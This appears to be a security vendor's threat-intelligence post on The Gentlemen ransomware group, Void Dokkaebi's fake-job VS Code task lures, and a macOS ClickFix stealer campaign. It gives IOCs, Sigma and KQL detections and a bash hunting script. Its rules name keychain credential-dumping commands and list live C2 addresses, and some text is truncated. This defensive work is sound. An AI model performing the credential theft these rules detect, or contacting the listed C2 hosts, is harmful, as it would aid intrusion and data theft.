Recent OTX pulses reveal a convergence of high-impact threats targeting enterprise infrastructure, software supply chains, and endpoint platforms. The Gentlemen, a sophisticated RaaS operation, is actively exploiting vulnerabilities in FortiOS and VMware environments (CVE-2024-37085, CVE-2024-55591) to deploy LockBit 5.0, Medusa, and Babuk variants. Simultaneously, the North Korea-aligned Void Dokkaebi (WageMole) group has refined its social engineering tactics, using fake job interviews to distribute malicious VS Code tasks via poisoned Git repositories, facilitating the spread of DEV#POPPER RAT and BeaverTail. Separately, a macOS ClickFix campaign is utilizing fake CAPTCHA pages to trick users into running AppleScript stealers capable of exfiltrating data from over 200 browser extensions and 16 cryptocurrency wallets. Collectively, these pulses highlight a shift toward multi-vector exploitation combining CVE abuse, developer-centric supply chain attacks, and cross-platform social engineering.
Threat Actor / Malware Profile
The Gentlemen (RaaS)
- Profile: A ransomware-as-a-service group utilizing a database of compromised devices to facilitate initial access.
- Malware Families: LockBit 5.0, Medusa, Babuk (Babyk), Vasa Locker, Qilin.
- TTPs: Exploits public-facing applications (FortiOS/FortiProxy), leverages CVE-2024-37085 for VMware ESXi escape, and employs extensive defense evasion.
Void Dokkaebi (Famous Chollima / WageMole)
- Profile: Nation-state actor targeting the technology and blockchain sectors.
- Malware Families: DEV#POPPER RAT, InvisibleFerret, OtterCookie, OmniStealer, BeaverTail.
- Distribution: Supply chain attack via malicious npm/Git repositories; lures involve fake job interviews for developers.
- Mechanism: Modifies VS Code
tasks.to execute malicious commands automatically upon project opening, creating a worm-like propagation effect.
macOS ClickFix (Unknown Actor)
- Profile: Financially motivated infostealer operation.
- Target: macOS and Windows users.
- Mechanism: "ClickFix" social engineering; fake CAPTCHA pages prompt users to copy/paste and execute malicious commands into Terminal or PowerShell.
- Payload: AppleScript-based infostealer targeting Keychain, browser cookies (Chrome, Firefox, Safari, Edge, Brave, etc.), and crypto wallets.
IOC Analysis
The provided IOCs span network infrastructure, file artifacts, and vulnerability identifiers:
- IPv4 Addresses: The Void Dokkaebi pulse lists multiple C2 IPs (e.g.,
166.88.4.2,85.239.62.36,23.27.20.143). The macOS ClickFix campaign utilizes172.94.9.250. SOC teams should immediately block these at perimeter firewalls and EDRs. - Domains:
bull-run.funand `spot-wave.fun are associated with the ClickFix campaign's fake CAPTCHA infrastructure. These should be added to DNS sinkholes. - CVEs: The Gentlemen are exploiting CVE-2024-37085 (VMware), CVE-2024-55591, and CVE-2025-32463 (Fortinet). Vulnerability management must prioritize patching these specific vulnerabilities.
- File Hashes: Multiple MD5, SHA1, and SHA256 hashes are provided for payloads (e.g.,
3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235). These should be loaded into EDR detection rules and SIEM correlation engines.
Detection Engineering
YAML
title: VS Code Task Execution via Anomalous Processes
id: 3ab95752-2026-0001
description: Detects execution of suspicious processes spawned by VS Code tasks., indicative of Void Dokkaebi supply chain attack.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/6624c8221c44997927e8fa72/
tags:
- attack.execution
- attack.t1204
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|contains: '\Code.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\bash.exe'
condition: selection
falsepositives:
- Legitimate developer build scripts
level: high
---
title: macOS ClickFix AppleScript Execution Pattern
description: Detects execution of osascript with base64 encoded arguments or suspicious keychain access, associated with ClickFix campaigns.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/6624c8221c44997927e8fa72/
tags:
- attack.execution
- attack.t1059.002
logsource:
category: process_creation
product: macos
detection:
selection_osascript:
Image|endswith: '/osascript'
CommandLine|contains: '-e'
selection_encoded:
CommandLine|contains: 'base64'
selection_keychain:
CommandLine|contains: 'security find-generic-password'
condition: 1 of selection*
falsepositives:
- Legitimate administrative scripts
level: critical
---
title: Network Connection to Void Dokkaebi C2 Infrastructure
id: 3ab95752-2026-0003
description: Detects network connections to known Void Dokkaebi C2 IPs associated with DEV#POPPER RAT.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/6624c8221c44997927e8fa72/
tags:
- attack.command_and_control
- attack.t1071
logsource:
category: network_connection
detection:
selection:
DestinationIp|contains:
- '166.88.4.2'
- '85.239.62.36'
- '23.27.20.143'
- '23.27.202.27'
- '154.91.0.196'
condition: selection
level: critical
kql
// Hunt for Void Dokkaebi and ClickFix Network Activity
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("166.88.4.2", "85.239.62.36", "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196", "198.105.127.210", "83.168.68.219", "172.94.9.250")
or RemoteUrl has_any ("bull-run.fun", "spot-wave.fun")
| extend ThreatCategory = iif(RemoteUrl has_any ("bull-run", "spot-wave"), "macOS ClickFix", "Void Dokkaebi C2")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteIP, RemoteUrl, ThreatCategory
bash
#!/bin/bash
# Hunt for Void Dokkaebi VS Code Task Persistence
# Checks for recent modifications to tasks. in .vscode directories
echo "[+] Scanning for suspicious VS Code task modifications..."
find /home -type d -name ".vscode" 2>/dev/null | while read dir; do
tasks_file="$dir/tasks."
if [ -f "$tasks_file" ]; then
# Check if modified in last 24 hours
if [ "$(( $(date +"%s") - $(stat -c %Y "$tasks_file") ))" -lt "86400" ]; then
echo "[!] Recently modified .vscode/tasks. found: $tasks_file"
echo "Content preview:"
cat "$tasks_file" | head -n 20
fi
fi
done
echo "[+] Checking hosts file for ClickFix domains..."
if grep -qE "bull-run\.fun|spot-wave\.fun" /etc/hosts; then
echo "[!] Suspicious domains found in /etc/hosts"
else
echo "[-] No suspicious domains in /etc/hosts"
fi
Response Priorities
Immediate (0-24h)
- Blocking: Block all listed Void Dokkaebi IPv4 addresses and ClickFix domains (
bull-run.fun,spot-wave.fun) at the perimeter and proxy level. - Hunting: Deploy the provided Sigma rules to hunt for VS Code spawning shells and macOS osascript activity.
- Patching: Emergency patch validation for CVE-2024-37085 (VMware ESXi) and CVE-2024-55591/CVE-2025-32463 (Fortinet).
Short-term (24-48h)
- Identity Verification: If credential stealing malware (OmniStealer, AppleScript stealers) is suspected, force-reset passwords for developers and privileged users who may have interacted with the fake job lures.
- Repository Audit: Scan internal Git repositories and CI/CD pipelines for the malicious packages or VS Code task configurations associated with Void Dokkaebi.
Long-term (1 Week)
- Architecture Hardening: Implement strict controls on VS Code task execution and enforce "require signed tasks" policies where possible.
- Training: Update security awareness training to include specific examples of the "fake job interview" supply chain lure and "ClickFix" fake CAPTCHA mechanics.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-aptthe-gentlemenvoid-dokkaebiclickfixransomwaresupply-chain
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.